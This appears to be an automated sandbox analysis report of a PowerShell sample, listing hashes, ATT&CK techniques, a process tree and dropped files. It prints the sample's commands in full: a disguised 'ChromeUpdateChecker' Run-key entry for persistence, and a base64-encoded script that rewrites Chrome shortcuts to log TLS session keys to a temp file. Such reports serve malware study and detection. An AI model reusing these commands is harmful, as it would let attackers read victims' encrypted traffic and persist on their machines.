9e87cc0374383be000268a7baeda2712a164d4dc8138a5218497da883adb1a61

Resubmissions

25/04/2024, 08:25

240425-ka9p9aha9v 6

25/04/2024, 08:17

240425-j671vsha49 6

Analysis

max time kernel
116s
max time network
116s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
25/04/2024, 08:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

malicious.ps1
Size

41KB
MD5

b0eabea0c5a9d7805de694b90de4211a
SHA1

12363433de1259efd04ffa0cb569ad1874f68405
SHA256

9e87cc0374383be000268a7baeda2712a164d4dc8138a5218497da883adb1a61
SHA512

ac7f19224164c09b4ba80142a35eb68a26bac57e51108f511bff57713dfe1e1e0c512a95165a0dc1b2b951ad046fba6fafc4d535dccc93a1023615be36fd34db
SSDEEP

768:ww7zzQcwdAXDWAFQIkvqb+1wMm7hkmV5X0+KeFFLj4zb197:wwZXqAFlk8dMmVhV5hdjCZ97

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdateChecker = "powershell -ep Bypass -File C:\\Users\\Admin\\AppData\\Local\\Temp\\run.ps1"	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1052	powershell.exe
1052	powershell.exe
3144	powershell.exe
3144	powershell.exe
4420	powershell.exe
4420	powershell.exe
4512	powershell.exe
4512	powershell.exe
1424	msedge.exe
1424	msedge.exe
3628	msedge.exe
3628	msedge.exe
4512	powershell.exe
5916	identity_helper.exe
5916	identity_helper.exe
1808	powershell_ise.exe
1808	powershell_ise.exe
1808	powershell_ise.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	4420	powershell.exe
Token: SeDebugPrivilege	4512	powershell.exe
Token: 33	2412	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2412	AUDIODG.EXE
Token: SeDebugPrivilege	1808	powershell_ise.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe
3628	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1052 wrote to memory of 3144	1052	powershell.exe	88
PID 1052 wrote to memory of 3144	1052	powershell.exe	88
PID 1052 wrote to memory of 4420	1052	powershell.exe	90
PID 1052 wrote to memory of 4420	1052	powershell.exe	90
PID 4420 wrote to memory of 3628	4420	powershell.exe	91
PID 4420 wrote to memory of 3628	4420	powershell.exe	91
PID 3628 wrote to memory of 4944	3628	msedge.exe	92
PID 3628 wrote to memory of 4944	3628	msedge.exe	92
PID 1052 wrote to memory of 4512	1052	powershell.exe	93
PID 1052 wrote to memory of 4512	1052	powershell.exe	93
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 3052	3628	msedge.exe	94
PID 3628 wrote to memory of 1424	3628	msedge.exe	95
PID 3628 wrote to memory of 1424	3628	msedge.exe	95
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96
PID 3628 wrote to memory of 428	3628	msedge.exe	96

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malicious.ps1
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand ZgBvAHIAZQBhAGMAaAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAIABpAG4AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAALQBSAGUAYwB1AHIAcwBlACAALQBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAALQBJAG4AYwBsAHUAZABlACAAKgAuAGwAbgBrACkAewAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsADsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAD0AJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAEMAcgBlAGEAdABlAFMAaABvAHIAdABjAHUAdAAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAKQA7AGkAZgAoACQAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgAuAFQAYQByAGcAZQB0AFAAYQB0AGgAIAAtAG0AYQB0AGMAaAAgACcAYwBoAHIAbwBtAGUAXAAuAGUAeABlACQAJwApAHsAJABiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAC4AQQByAGcAdQBtAGUAbgB0AHMAPQAiAC0ALQBzAHMAbAAtAGsAZQB5AC0AbABvAGcALQBmAGkAbABlAD0AJABlAG4AdgA6AFQARQBNAFAAXABkAGUAZgBlAG4AZABlAHIALQByAGUAcwAuAHQAeAB0ACIAOwAkAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIAYgBiAGIALgBTAGEAdgBlACgAKQA7AH0AfQAKAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAATQBhAHgAaQBtAGkAegBlAGQAIABoAHQAdABwAHMAOgAvAC8AaABlAGwAbABvAC4AcwBtAHkAbABlAHIALgBuAGUAdAA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4420
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://hello.smyler.net/
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3628
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff97ad046f8,0x7ff97ad04708,0x7ff97ad04718
      4⤵
      PID:4944
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
      4⤵
      PID:3052
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
      4⤵
      PID:428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
      4⤵
      PID:4752
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
      4⤵
      PID:3064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
      4⤵
      PID:3528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
      4⤵
      PID:4904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4736 /prefetch:8
      4⤵
      PID:1400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5264 /prefetch:8
      4⤵
      PID:5188
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
      4⤵
      PID:5484
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5916
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
      4⤵
      PID:5932
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
      4⤵
      PID:5940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
      4⤵
      PID:5468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9974521695244288464,6672823159375268794,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
      4⤵
      PID:5488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4512

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4360

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1572

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1088

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x320 0x31c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2412

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\Admin\AppData\Local\Temp\run.ps1"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
48cff1baabb24706967de3b0d6869906

SHA1
b0cd54f587cd4c88e60556347930cb76991e6734

SHA256
f6b5fbc610a71b3914753feb2bd4475a7c77d0d785cc36255bf93b3fe3ccb775

SHA512
fd0c848f3f9de81aca81af999262f96ea4c1cd1d1f32d304f56c7382f3b1bb604e5fbe9f209ad6e4b38988d92357ef82e9668806d0727f2856c7dc1f07aae2b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7b56675b54840d86d49bde5a1ff8af6a

SHA1
fe70a1b85f88d60f3ba9fc7bb5f81fc41e150811

SHA256
86af7213f410df65d0937f4331f783160f30eaeb088e28a9eef461713b9a3929

SHA512
11fc61b83365391efee8084de5c2af7e064f0182b943a0db08d95a0f450d3877bde5b5e6a6b9f008e58b709bb1a34f7b50085c41927f091df1eea78f039402e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
528B

MD5
8e0487c59cfb053a4d6d7bc5dbf450d1

SHA1
e621b4fbc99b0c8af8f215e9bdf3378bdc8ba324

SHA256
6c2c0d83399e35220bef4df2bce464c8026c8f73dad044b41d4f3ae61c4e585f

SHA512
9a5c905690a266d07561051464486f62b081ce867d47104e372f47f234c1d7399f2fc591b02c3369ef0ad3c99b1d3295745736175da357389eaaa853c9276df9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
db490919145abbed2da4f54d60b94ba8

SHA1
8681a3291ea51909c1971b271835f06ae6cd3b51

SHA256
35d6453969418377343dad2bafd24a8a465cf6e4475194f51f05caf46b5bfcf2

SHA512
476af00a3641696076f308aa0ceb878ee12bf9ad09a64af7bff24ccb413791ee563813712ac7f599d7903dea6506dd20fb6d767965820441e39235fa74db29f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
38e80d0f2e5fefb34c2bdc0ae07f1518

SHA1
2514f3e204499418c927d7b97d1fa3a4ed9bee77

SHA256
f63ab23fbb27609de3937d58317dfde96152b8cfd90d211dafe4b8785cd4b256

SHA512
7b83f2e68dcac1745ac4c53ad63bffadd1925236b0056d21e17a8ca5d6ae1324f700dc1ff6b0d8c133fcde241e74b85257ec4176b0d29656e3baefd972b5f758

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
01d72e5d15b8f606331af0afc6b109a0

SHA1
dea778193cdad96bb2f7c275d1075a1baabf8c39

SHA256
40ba0c529d3cce9897b2e309971860965ad9b1dca29d2fae473f6f5d1e5158ad

SHA512
db00cfd541b467a968980c0309985d7ab5f305a008c0ad09d6aa87529c310b704166f1b8761587f6153e76386132377a5197e04cc521b56f6348830e8cb5efa1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
2d3c2e8c304ec7739c55dfd6493a7399

SHA1
b139696031bf4ed72e6b11f543e99374c89cefda

SHA256
9e432c9aa74d85847e324db94386da189b4b1893727163c5ea741ce9c39cdd89

SHA512
149af754a51bb707ca9d8dd87fac4a849e6c148f31b8a8bdcb1b6c2bcac63203fa1e3369f3ca9b4b917df74c8c82fe4f50b80e08b4e4cdbd58e8f33356bae576

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\5fdaca0d-f2f4-47eb-89d7-a2407b261e8c\index-dir\the-real-index

Filesize
624B

MD5
6c6fc4ab41975ea6706e0e80003bcb24

SHA1
3ea48f27161cdeb74b5e856b0fbe7036e00d9231

SHA256
826838add863d7c65518b88e659f8b6306fa9e58d6d52429f38b9b2cd604a13c

SHA512
da28c020962696b09805b26b01e5f1f3c50bb5532cbc6772d5b8c8669716436772fc97a1274cd72c6f8ced7a38b38125f06e42d792e26f8bb83cb158fdd77108

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\5fdaca0d-f2f4-47eb-89d7-a2407b261e8c\index-dir\the-real-index~RFe578491.TMP

Filesize
48B

MD5
1b70849bc38015d86dc4b0895c7bf42e

SHA1
69e5080c05787f89c5c4e70ae1eee07f60e7667f

SHA256
bc04a83abe6a1beacf67345445866a89b6375106272a78508f699fb44f4538fd

SHA512
57b898e32ead4beb753fc7fbff9abf295cf651336efe596d0d22c02880463120d78abae9d56647d3cff14bc7df24cd976a65c06ad841f427ab8a501d287ec43c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6c336029-6d14-471b-b5f1-0f57d71a9362\index-dir\the-real-index

Filesize
2KB

MD5
6a2fef3b6f54331d5482b45a585fb227

SHA1
8f30d319de6daf3c057bbe28bc18ac73ea45420f

SHA256
30fa60774f2a3c65d74b3262d8ed0259cf78e934bb37b026711bd6de433fd468

SHA512
00744b23383f51ead9a7f596970d1b15e54fb4731950302e730d81194be28f3ab255b8391a66b3b93be38bd17f0b97d30a0f4e15136f72b80a0f6f2c4ff8239c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\6c336029-6d14-471b-b5f1-0f57d71a9362\index-dir\the-real-index~RFe578491.TMP

Filesize
48B

MD5
7662b961d40c9e40d1661034497306cc

SHA1
5340943541cf39c692ace04db89708edfc7b3ecb

SHA256
b4e738c397c8a4ccd3ad558095b1bdc25ae52535189c061b25e0754b90e1a000

SHA512
a328732139db8a7f867ccd039b502d0f07c37d7a6aed1fa6d7fc9764f040750a798d0ed53772742302104fc0177ab7035e57eabda1e295bd4bfa0edf52442922

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
b64b85d857c42e874bbe3f9da1b89d3f

SHA1
a00f9ff6086264da15728b3af8261bf88bd54f8a

SHA256
12fe5c68608f343a51deafc9727cc23d3c6fdc75083f50c3e3aff4483eb588ae

SHA512
0c365b9fb5fb60b8573ceb4ed7100a6f511344c72c95e769127804c9bc1f53adf0528fd68f9aaba19d80a6a707f1cd02bef267b8db2d72b491c8fe6c05875423

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
155B

MD5
90efb13695298e98c8687fc218c5e056

SHA1
e9ac2fb664a60286120194440f94bc4e5593fb1d

SHA256
dd605fda9a8b63b9779b87282a055bf003e15d4c08de9e56d496cf0c90052fa2

SHA512
36e4666bf79f58c6b8852758091443f1921605d44719b86c2fb1f4b4d0456d5e973dbfe6da76c34733ca0490a2d0a916ebb8099d4c0a0197b08ce98eb660fbc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
153B

MD5
3f5904b8d638457409d45157eaeef2c3

SHA1
d2138092e619e95d15972a449b62fe1ceb79d1f7

SHA256
2003e797086a6859251c936db7121d521d20b7e0877619c15cadd598196d2d88

SHA512
76214ba7f0147d3d154aed783ff5c1b0848d60333134d45a80b9569084c771281afb2bd0809f143d85dce286e824d9cea25fa96a403f775b61d802da20c7fe27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
4b0fe9ac4631e5977a702a546dfa333c

SHA1
cac797fa53a2a9fc0682125090cd6af87aa473b0

SHA256
490bfbc4192dff3e34fee41f8a8ee5d9d90220322b913714989620847db8a791

SHA512
